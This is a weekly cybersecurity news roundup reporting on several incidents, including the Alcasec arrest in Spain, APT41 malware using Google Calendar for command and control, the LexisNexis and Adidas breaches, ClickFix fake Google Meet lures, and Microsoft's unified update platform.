Cybercrime
,
Fraud Management & Cybercrime
,
Incident & Breach Response
Also, Stolen Cookies for Sale, LexisNexis Breach and an FBI Warning
Every week, Information Security Media Group rounds up cybersecurity incidents and breaches around the world. This week, José Luis Huertas “Alcasec” back in a Spanish jail, billions of stolen cookies for sale and Chinese hackers used Google Calendar. LexisNexis and Adidas had breaches, and the FBI warned law firms about vishing. ClickFix scammers used fake Google Meet pages and the Victoria’s Secret website went offline. Microsoft wants to control all the software updates on Windows computers.
See Also: On Demand | Global Incident Response Report 2025
Hacker Alcasec in the Jailhouse Again, Along With Former Spanish Government Official
Spanish hacker José Luis Huertas is again in jail along with a former high-level official from the Ministry of Interior after authorities accused them of mounting a private intelligence company fueled by stolen data.
A judge on Thursday ordered Huertas into provisional detention, along with Francisco Martínez, a conservative politician who was the secretary of state security between 2013 and 2016, reported public broadcaster Radiotelevisión Española.
Huertas, aka “Alcasec,” gained fame after authorities in 2023 called him a “severe national security risk” following his October 2022 hacking of a government file transfer system and the theft of sensitive data belonging to more than half a million taxpayers. The incident was a capstone to years spent cultivating a teenaged Robin Hood reputation built on stunts such as distributing stolen HBO accounts online and hacking the Burger King ordering system to offer free food (see: Spanish Police Arrest ‘Dangerous’ Teenage Hacker).
Spanish police arrested Huertas and Martínez and two other suspects on Tuesday, accusing them of criminal conspiracy, money laundering and exposure of secrets. El País reported authorities began investigating after detecting in 2024 a series of systematic cyberattacks against government agencies. The national competition agency reported a “massive exfiltration of personal data” including names connected to mobile phones, the newspaper reported.
The investigation, dubbed “Operation Borraska,” revealed a cloud platform for storing, indexing and commercializing data pertaining to individuals and corporations. That allowed the conspiracy to create personal profiles and cross-check information in real time, police said. Members allegedly hid their real work by mounting a technology services company. Conspiracy members had clearly articulated responsibilities, such as system administration, cryptocurrency management and business development, police also said.
Authorities said the conspiracy had access to data linked to millions of Spanish citizens, including school records, civil registries, telephone accounts and electricity consumption. Huertas told Madrid state judge María Tardón that he collected information exposed to the open internet through artificial intelligence.
Prosecutors are already seeking a three-year prison sentence for Huertas for his government file transfer hack. In a sit-down interview in March 2024, Huertas told online newspaper El Confidencial that his brush with the justice system made him a reformed man and that he was shifting his energies into legitimate endeavors (see: Breach Roundup: Catching Up With Alcasec, Spain’s Most Dangerous Hacker).
Cybersecurity experts are raising alarms over the availability of stolen browser cookies on the dark web and Telegram marketplaces. NordVPN uncovered more than 93.7 billion cookies are currently for sale, with up to 9% of them still active and exploitable. Cookies can grant cybercriminals unauthorized access to personal accounts without the need for passwords.
A majority of cookies available for illicit purchase are used for user identification and targeted advertising. But a significant portion – around 1.2 billion – are session cookies, potentially allowing attackers to impersonate users, bypass multi-factor authentication and access email, banking and corporate systems.
APT41 Exploits Government Site to Deliver Stealthy Malware via Google Calendar
Google’s Threat Intelligence Group uncovered a cyber-espionage campaign by the Chinese state-sponsored actor it tracks as APT41. Google late last year discovered that APT41 compromised a government website to distribute a malware strain dubbed “Toughprogress,” which uses Google Calendar for command-and-control communications.
The attack begins with spear-phishing emails containing links to a zip archive hosted on the compromised site. This archive includes a deceptive LNK file disguised as a PDF and a folder of images. On execution, the LNK file deletes itself and displays a decoy PDF, while simultaneously initiating a multi-stage malware deployment. The two files masquerading as images are an encrypted payload and its corresponding decryption DLL.
Toughprogress comprises three modules, each designed for stealth and evasion, operating entirely in memory to avoid detection. The malware communicates with its operators via Google Calendar, blending malicious traffic with legitimate services.
APT41, also tracked as Barium, Earth Baku and Winnti, targets sectors including government, shipping, media, technology and automotive industries. Google said it responded to the campaign by deploying custom detection signatures, dismantling attacker infrastructure, and enhancing Safe Browsing protections.
LexisNexis Risk Solutions Breach Exposes Data of 364,000 People
Multinational data broker LexisNexis Risk Solutions said a data breach exposed personal information of over 364,000 individuals. The breach, traced back to GitHub – a platform the company uses for software development – was reported by an unknown third party on April 1.
An internal investigation supported by a forensics firm revealed that hackers accessed software artifacts and sensitive data, including names, contact details, Social Security numbers, driver’s license numbers and birthdates.
Regulatory filings in Maine , Vermont and South Carolina show the breach occurred on Christmas Day. LexisNexis is offering two years of identity protection to affected individuals.
Adidas Cops to Data Breach via Third-Party Provider
Athletic apparel and footwear maker Adidas disclosed a data breach involving customer information stolen from a third-party customer service provider. The exposed data “mainly consists” of contact details of individuals who reached out to the Adidas help desk, though no passwords or payment information were affected.
FBI Warns of Vishing Attacks on Law Firms
The FBI published a warning about an ongoing vishing campaign targeting legal firms by a threat actor known as the Silent Ransom. Active since 2022, the group is known for extorting victims by stealing data rather than using ransomware.
The group uses social engineering tactics, including fake IT support calls and phishing emails, to trick victims into granting remote access to their systems. Once inside, attackers exfiltrate sensitive data and demand ransom for its return.
Phishing Scam Uses Fake Google Meet Pages
A ClickFix phishing campaign is exploiting fake Google Meet pages to trick users into executing malicious PowerShell commands, leading to infections with malware like AsyncRAT, StealC and Rhadamanthys.
The attack starts with phishing emails mimicking Google Meet invites. Victims are directed to fake meeting pages with deceptive domains such as meet.google.us-join.com. These pages simulate microphone permission errors and prompt users to click a “Try Fix” button, which silently copies a malicious PowerShell command to their clipboard.
Victims are then instructed to paste this command into PowerShell, triggering the download and execution of obfuscated scripts that load malware directly into memory. The attack uses decoy messages like “Verification complete!” while executing payloads that establish persistence, exfiltrate data and bypass browser security.
Advanced variants target Windows and macOS users. Attribution points to groups like TA571 and Slavic Nation Empire, with activity observed since March 2024.
Victoria’s Secret Takes Website Offline Following Security Incident
Lingerie retailer Victoria’s Secret temporarily shut down its website after detecting a cybersecurity incident, the company said. The disruption affected customers attempting to access victoriassecret.com, who were met with a maintenance message.
Victoria’s Secret has not confirmed whether customer data was compromised but said it will notify affected individuals and authorities if necessary.
Microsoft Unveils Unified Platform for App, Driver, and System Updates
Microsoft wants to take over ensuring that everything on a Windows computer is updated through an orchestration platform built on the existing Windows Update infrastructure.
Currently in private preview, the platform allows developers and IT teams to register software. Once registered, Microsoft’s orchestrator will run a provided update scan tool to detect pending updates, manage downloads and schedule installations.
The platform handles update complexities such as restarts, failed update retries and user notifications, Microsoft said. The computing giant said the goal is to unify what has traditionally been a fragmented update experience and provide a centralized system for IT admins and users. The orchestration engine also integrates with native Windows Update dialogs and displays update history alongside system updates in Settings.
Other Stories From Last Week
With reporting by Information Security Media Group’s David Perera in Northern Virginia
